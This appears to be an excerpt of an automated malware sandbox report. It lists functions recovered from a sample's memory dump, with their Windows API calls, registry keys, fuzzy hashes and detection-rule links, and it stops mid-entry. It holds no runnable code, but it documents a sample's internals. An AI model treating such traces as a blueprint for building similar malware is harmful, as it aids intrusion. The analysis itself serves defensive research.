                                                            • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                                            • String ID: Software\Microsoft\WAB\DLLPath
                                                            • API String ID: 1628847533-3156921957
                                                            • Opcode ID: 9b40639c099986215c090c65e090d230a1440a151dc8daf518ad89b5e5701648
                                                            • Instruction ID: 5e41f205d6dcfa7381697254840e75655fe11637222e48bbd862b8a6cfe9e7bf
                                                            • Opcode Fuzzy Hash: 9b40639c099986215c090c65e090d230a1440a151dc8daf518ad89b5e5701648
                                                            • Instruction Fuzzy Hash: E2218676900115FFCB21ABA5EC88CAEBBBCFB84751B100155F802B7115EA356E44FB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456DB46, Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL ref: 0456DB87
                                                            • memset.NTDLL ref: 0456DB9B
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • GetCurrentThreadId.KERNEL32 ref: 0456DC28
                                                            • GetCurrentThread.KERNEL32 ref: 0456DC3B
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 0456DCE2
                                                            • Sleep.KERNEL32(0000000A), ref: 0456DCEC
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 0456DD12
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0456DD40
                                                            • HeapFree.KERNEL32(00000000,00000018), ref: 0456DD53
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                                            • String ID:
                                                            • API String ID: 1146182784-0
                                                            • Opcode ID: d95eeff696ec9354a5afef0beee50ca72dff808c73ab833959a2d51789798b0d
                                                            • Instruction ID: 705b5b937da907142630f4355be25fe035fd085e48c769c3ce39a0237b9a570e
                                                            • Opcode Fuzzy Hash: d95eeff696ec9354a5afef0beee50ca72dff808c73ab833959a2d51789798b0d
                                                            • Instruction Fuzzy Hash: 6A510BB1604245AFE721DF65E88091ABBF8FB88344F405D2EF585E7250DB34ED4CAB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04582F05, Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04574211: RtlEnterCriticalSection.NTDLL(0458C328), ref: 04574219
                                                              • Part of subcall function 04574211: RtlLeaveCriticalSection.NTDLL(0458C328), ref: 0457422E
                                                              • Part of subcall function 04574211: InterlockedIncrement.KERNEL32(0000001C), ref: 04574247
                                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04582F42
                                                            • memset.NTDLL ref: 04582F53
                                                            • lstrcmpi.KERNEL32(?,?), ref: 04582F93
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04582FBF
                                                            • memcpy.NTDLL(00000000,?,?), ref: 04582FD3
                                                            • memset.NTDLL ref: 04582FE0
                                                            • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 04582FF9
                                                            • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 0458301C
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04583039
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                                            • String ID:
                                                            • API String ID: 694413484-0
                                                            • Opcode ID: e6db525d6b95d951fb41feae9300ded972cc976af86cdb1517f385e9953bd760
                                                            • Instruction ID: 8a809769550089f73f28bac1fcf0ef62687cf61f50fa604daa086412deb4b757
                                                            • Opcode Fuzzy Hash: e6db525d6b95d951fb41feae9300ded972cc976af86cdb1517f385e9953bd760
                                                            • Instruction Fuzzy Hash: 5441AF71E0020AEFDB109FA5DC84A9D7BB9FB04718F14846DF905B7251DB39AE09EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457DFE6, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000008,00000008,?,?,?), ref: 0457DFFD
                                                            • lstrlen.KERNEL32(?,?,?), ref: 0457E005
                                                            • lstrlen.KERNEL32(00000001,?,?), ref: 0457E070
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457E09B
                                                            • memcpy.NTDLL(00000000,00000002,?,?,?), ref: 0457E0AC
                                                            • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?), ref: 0457E0C2
                                                            • memcpy.NTDLL(00000000,00000001,00000001,00000000,00000000,00000000,?,?,?,?,?), ref: 0457E0D4
                                                            • memcpy.NTDLL(00000000,045863D8,00000002,00000000,00000001,00000001,00000000,00000000,00000000,?,?,?,?,?), ref: 0457E0E7
                                                            • memcpy.NTDLL(00000000,?,00000002,?,?,?,?,?), ref: 0457E0FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy$lstrlen$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3386453358-0
                                                            • Opcode ID: c3a9338958a358cfc44d614fc03c8518b3080be3242756cf6286ed8403647a35
                                                            • Instruction ID: d59fc983227beec101486b4fdccbf7588d7a6dd0218bec6c98fc9e90d83ca967
                                                            • Opcode Fuzzy Hash: c3a9338958a358cfc44d614fc03c8518b3080be3242756cf6286ed8403647a35
                                                            • Instruction Fuzzy Hash: CD414F71D0031AEFCF00DFA8DC85A9EBBB9FF44254F1444A9E915A7201E771EA54EB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457C3B5, Relevance: 13.6, APIs: 9, Instructions: 110librarymemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001), ref: 0457C3D5
                                                            • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04573914), ref: 0457C3DF
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C408
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C416
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C424
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C432
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C440
                                                            • LoadLibraryA.KERNEL32(?), ref: 0457C44E
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?), ref: 0457C4F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad$AllocFreeHeap
                                                            • String ID:
                                                            • API String ID: 356845663-0
                                                            • Opcode ID: 31f4e5c3fe8e3e27a7a95d41aabdc7f0b6eb9bc2c715468483987ec1015cae12
                                                            • Instruction ID: 21081f3adc9d0cb2cd065d4c4492fbe6602930d9d8e43db9cb40843f3eef8654
                                                            • Opcode Fuzzy Hash: 31f4e5c3fe8e3e27a7a95d41aabdc7f0b6eb9bc2c715468483987ec1015cae12
                                                            • Instruction Fuzzy Hash: 43413971900219EFDB11EFA8E8C4D5A77F9FB08304F1155AAE605F7280DA78FD48AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04580EB9, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04574211: RtlEnterCriticalSection.NTDLL(0458C328), ref: 04574219
                                                              • Part of subcall function 04574211: RtlLeaveCriticalSection.NTDLL(0458C328), ref: 0457422E
                                                              • Part of subcall function 04574211: InterlockedIncrement.KERNEL32(0000001C), ref: 04574247
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04580F0A
                                                            • lstrlen.KERNEL32(00000008,?,?,?,04563273,?,00000000,73B76900,00000000), ref: 04580F19
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 04580F2B
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,04563273,?,00000000,73B76900,00000000), ref: 04580F3B
                                                            • memcpy.NTDLL(00000000,?,?,?,?,?,04563273,?,00000000,73B76900,00000000), ref: 04580F4D
                                                            • lstrcpy.KERNEL32 ref: 04580F7F
                                                            • RtlEnterCriticalSection.NTDLL(0458C328), ref: 04580F8B
                                                            • RtlLeaveCriticalSection.NTDLL(0458C328), ref: 04580FE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3746371830-0
                                                            • Opcode ID: 3cfbde572c8654196f349974ad06281936e8dbd4a9e9ed6f1975682abeca2ec0
                                                            • Instruction ID: ca3ba4f7396f007403a6a67673bf89293038d0caf0ebde8e07e556fe50d8572b
                                                            • Opcode Fuzzy Hash: 3cfbde572c8654196f349974ad06281936e8dbd4a9e9ed6f1975682abeca2ec0
                                                            • Instruction Fuzzy Hash: 9E417971500705EFDB22AF68E844B5A7BF8FB48B15F11841DF805A7281DF74E958EB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457605B, Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04579F80: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04579FB2
                                                              • Part of subcall function 04579F80: HeapFree.KERNEL32(00000000,00000000,?,?,04568FA2,?,00000022,?,?,?,?,?,?,?,?,?), ref: 04579FD7
                                                              • Part of subcall function 0457DF48: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,04576098,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0457DF84
                                                              • Part of subcall function 0457DF48: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,04576098,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0457DFD7
                                                            • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 045760CD
                                                            • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 045760D5
                                                            • lstrlen.KERNEL32(?), ref: 045760DF
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 045760F4
                                                            • wsprintfA.USER32 ref: 04576130
                                                            • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0457614F
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04576164
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04576171
                                                            • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0457617F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                                            • String ID:
                                                            • API String ID: 168057987-0
                                                            • Opcode ID: 5a506bea4e7dc3547e247725dcdf5a7a707d6b3ed47c3bbf647fed5f4072f1b2
                                                            • Instruction ID: 6d0c409930fb19baaf0fd07ba477f32e7761f1b39222cad79a231f007d28f96e
                                                            • Opcode Fuzzy Hash: 5a506bea4e7dc3547e247725dcdf5a7a707d6b3ed47c3bbf647fed5f4072f1b2
                                                            • Instruction Fuzzy Hash: A1319071600316ABDB21AF65EC44E5FBBE8FF84354F010529F544A2292DF74EC18EBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457533D, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,0457F1B3,00000000,0457F1B4,00000080,00000000,00000000,04584C6A,00000000,0457F1B3,?), ref: 0457537E
                                                            • GetLastError.KERNEL32 ref: 04575388
                                                            • WaitForSingleObject.KERNEL32(000000C8), ref: 045753AD
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 045753CE
                                                            • SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 045753F6
                                                            • WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 0457540B
                                                            • SetEndOfFile.KERNEL32(00000001), ref: 04575418
                                                            • GetLastError.KERNEL32 ref: 04575424
                                                            • CloseHandle.KERNEL32(00000001), ref: 04575430
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                                            • String ID:
                                                            • API String ID: 2864405449-0
                                                            • Opcode ID: c762c9996f0a81f8cf5ef22155967fc82d7f9790e43fdba582c560da42b3e8c9
                                                            • Instruction ID: 1bda23fe0f666c37d4ef027a7d7192d10b85836123a302ee2e6ea2fe7f00ca36
                                                            • Opcode Fuzzy Hash: c762c9996f0a81f8cf5ef22155967fc82d7f9790e43fdba582c560da42b3e8c9
                                                            • Instruction Fuzzy Hash: A0319C7190020DFBEF108FA4ED49BAE7BB9FB00315F204168F910E60E0E7B49A54EB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456FF29, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,0457428F,00000008,?,00000010,00000001,00000000,0000003A), ref: 0456FF48
                                                            • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0456FF7C
                                                            • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 0456FF84
                                                            • GetLastError.KERNEL32 ref: 0456FF8E
                                                            • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0456FFAA
                                                            • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0456FFC3
                                                            • CancelIo.KERNEL32(?), ref: 0456FFD8
                                                            • CloseHandle.KERNEL32(?), ref: 0456FFE8
                                                            • GetLastError.KERNEL32 ref: 0456FFF0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                                            • String ID:
                                                            • API String ID: 4263211335-0
                                                            • Opcode ID: 5966ec79b88acba9aa972f138bb92060cba2135f30d5c32cd0c7624748d5a6a7
                                                            • Instruction ID: 90bc6c26bb13791ee19e1324432739f9f49b93de3e72c74112aa4a7cf3ca66c5
                                                            • Opcode Fuzzy Hash: 5966ec79b88acba9aa972f138bb92060cba2135f30d5c32cd0c7624748d5a6a7
                                                            • Instruction Fuzzy Hash: 35214F32901218FFDB119FA8F8489DEBB79FB49351F00842AF916E7141DB749A44EBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045781D1, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04572283,00000000,73BCF5B0,0456824E,?,00000001), ref: 045781DD
                                                            • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 045781F3
                                                            • _snwprintf.NTDLL ref: 04578218
                                                            • CreateFileMappingW.KERNEL32(000000FF,0458C1A8,00000004,00000000,00001000,?), ref: 04578234
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04578246
                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0457825D
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 0457827E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04578286
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                            • String ID:
                                                            • API String ID: 1814172918-0
                                                            • Opcode ID: 33091376c52e67a715864c600c4eec68c3f10b479f9ed2ef67f465b1afcf3799
                                                            • Instruction ID: 682085073c46eeb43752b90bfd94e72a87e5dc67f9ac8140d893a403fd8bffae
                                                            • Opcode Fuzzy Hash: 33091376c52e67a715864c600c4eec68c3f10b479f9ed2ef67f465b1afcf3799
                                                            • Instruction Fuzzy Hash: C821A172640604FBDB11ABA4EC09F8E77B9BB84751F244025FA01F72C0EE74A904AB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04576FE4, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 190stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 045770E2
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04577105
                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 0457710D
                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 04577158
                                                            • memcpy.NTDLL(00000000,?,00000008,00000006), ref: 045771C0
                                                            • LocalFree.KERNEL32(?,00000006), ref: 045771D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                                            • String ID: P
                                                            • API String ID: 3649579052-3110715001
                                                            • Opcode ID: 947076c8108211b7b0518a36c1c4b9707a237770be5923671eabe806632ed61f
                                                            • Instruction ID: 78c28f77585861c9c7b9742311bc1277554e3171b4adc732cc66b1c58228d043
                                                            • Opcode Fuzzy Hash: 947076c8108211b7b0518a36c1c4b9707a237770be5923671eabe806632ed61f
                                                            • Instruction Fuzzy Hash: 2361297190020AAFDF119FA5FC84DAE7BB8FF48748F054029F515B7250DB35BA09AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04570E2E, Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04581736: RegCreateKeyA.ADVAPI32(80000001,049BA7F0,?), ref: 0458174B
                                                              • Part of subcall function 04581736: lstrlen.KERNEL32(049BA7F0,00000000,00000000,00000000,?,045768CE,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?,04575AB0), ref: 04581774
                                                            • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04570E73
                                                            • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04570E8B
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570EED
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04570F01
                                                            • WaitForSingleObject.KERNEL32(00000000,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F53
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F7C
                                                            • HeapFree.KERNEL32(00000000,04572333,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F8C
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                                            • String ID:
                                                            • API String ID: 3503961013-0
                                                            • Opcode ID: 91ccd500bd9f962960119c61fbe7fa7b2a5e9ff0949907046d8fce9151c610ea
                                                            • Instruction ID: 93fba88f4c14c7f603d42733c68980e1d6416efc7465c0736ebfefebe444dee6
                                                            • Opcode Fuzzy Hash: 91ccd500bd9f962960119c61fbe7fa7b2a5e9ff0949907046d8fce9151c610ea
                                                            • Instruction Fuzzy Hash: FD41C571C00109EFDF119F95EC848EEBBB9FB08344F50946AE514B2251DB35AE99EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456F895, Relevance: 12.1, APIs: 8, Instructions: 112memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • StrChrA.SHLWAPI(00000000,0000002C,7656D3B0,00000000,00000000,04575ADA), ref: 0456F8C6
                                                            • StrChrA.SHLWAPI(00000001,0000002C), ref: 0456F8D9
                                                            • StrTrimA.SHLWAPI(00000000,?), ref: 0456F8FC
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 0456F90B
                                                            • lstrlen.KERNEL32(00000000), ref: 0456F940
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0456F953
                                                            • lstrcpy.KERNEL32(00000004,00000000), ref: 0456F971
                                                            • HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 0456F995
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1974185407-0
                                                            • Opcode ID: aa8721e48028074db601f17174c307ac6f6cb92165ce7927df9cb8d382d3ea22
                                                            • Instruction ID: b4e11b6667816739ca7026babc5c85d5559a18adc3320b6506c0c1931ae68c49
                                                            • Opcode Fuzzy Hash: aa8721e48028074db601f17174c307ac6f6cb92165ce7927df9cb8d382d3ea22
                                                            • Instruction Fuzzy Hash: ED31BF76900209FFDB119FA9EC84EAE7FB8FF05744F14505AF905A7200EB78A944EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456C12C, Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0456C142
                                                            • wsprintfA.USER32 ref: 0456C16A
                                                            • lstrlen.KERNEL32(00000008), ref: 0456C179
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            • wsprintfA.USER32 ref: 0456C1B9
                                                            • wsprintfA.USER32 ref: 0456C1EE
                                                            • memcpy.NTDLL(00000000,?,?), ref: 0456C1FB
                                                            • memcpy.NTDLL(00000008,045863D8,00000002,00000000,?,?), ref: 0456C210
                                                            • wsprintfA.USER32 ref: 0456C233
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                                            • String ID:
                                                            • API String ID: 2937943280-0
                                                            • Opcode ID: bce6ed14c01495bd409210bcad286befe348d058b30042235b71518d52e110b3
                                                            • Instruction ID: e6c17e821801adfc2e3511bf47402b21f0b67b6b6735b95bc977b62e3584839f
                                                            • Opcode Fuzzy Hash: bce6ed14c01495bd409210bcad286befe348d058b30042235b71518d52e110b3
                                                            • Instruction Fuzzy Hash: DD412E71A00209EFDB01DFA9D884EAAB7FCFF44308B144459F95AE7211EA35FE159B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457BDCC, Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?), ref: 0457BDF0
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0457BE02
                                                            • wcstombs.NTDLL ref: 0457BE10
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE34
                                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0457BE49
                                                            • mbstowcs.NTDLL ref: 0457BE56
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE68
                                                            • HeapFree.KERNEL32(00000000,00000000,00000001,00000001,?,0457A2FF,?,?,?,?,?), ref: 0457BE82
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                                            • String ID:
                                                            • API String ID: 316328430-0
                                                            • Opcode ID: a166f9145cddec188ee60c59731d1a6a2643be50ec57443320b65f4a59570987
                                                            • Instruction ID: 6debd9bf99fdd4dd127e1ade0697eb2521680b4d735c0bdafc535725b92d8477
                                                            • Opcode Fuzzy Hash: a166f9145cddec188ee60c59731d1a6a2643be50ec57443320b65f4a59570987
                                                            • Instruction Fuzzy Hash: AB217C7150020AFFCF108FA1EC08E9E7B79FB44318F104029FA01AA261DB35AE65FB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045745BD, Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(04562555,00000000,00000000,0458C340,?,?,0456718B,04562555,00000000,04562555,0458C320), ref: 045745D0
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 045745DE
                                                            • wsprintfA.USER32 ref: 045745FA
                                                            • RegCreateKeyA.ADVAPI32(80000001,0458C320,00000000), ref: 04574612
                                                            • lstrlen.KERNEL32(?), ref: 04574621
                                                            • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0457462F
                                                            • RegCloseKey.ADVAPI32(?), ref: 0457463A
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04574649
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                                            • String ID:
                                                            • API String ID: 1575615994-0
                                                            • Opcode ID: 4e273cd57bd815fd15908f7fadf7949edc3b5784d368781b609cb5c1c762a437
                                                            • Instruction ID: 6a8e290cbb631bef802a93569396e543d0b998a40b229096addfe13f17f2d1e2
                                                            • Opcode Fuzzy Hash: 4e273cd57bd815fd15908f7fadf7949edc3b5784d368781b609cb5c1c762a437
                                                            • Instruction Fuzzy Hash: 27115B32100209FFDB015B95EC88EAA3B7DFB45715F101029FA05A6161DE7AAE58FB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045769E9, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000040,00000000,?), ref: 045769F5
                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04576A13
                                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04576A1B
                                                            • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 04576A39
                                                            • GetLastError.KERNEL32 ref: 04576A4D
                                                            • RegCloseKey.ADVAPI32(?), ref: 04576A58
                                                            • CloseHandle.KERNEL32(00000000), ref: 04576A5F
                                                            • GetLastError.KERNEL32 ref: 04576A67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                                            • String ID:
                                                            • API String ID: 3822162776-0
                                                            • Opcode ID: 1279c040be775b5bbb6c69ba90f500a06a7682b4fec0d9337d0b1dc32abbc834
                                                            • Instruction ID: bd5a345dcd87044df41494073272d63db1148ce3382244788057a675e76a733f
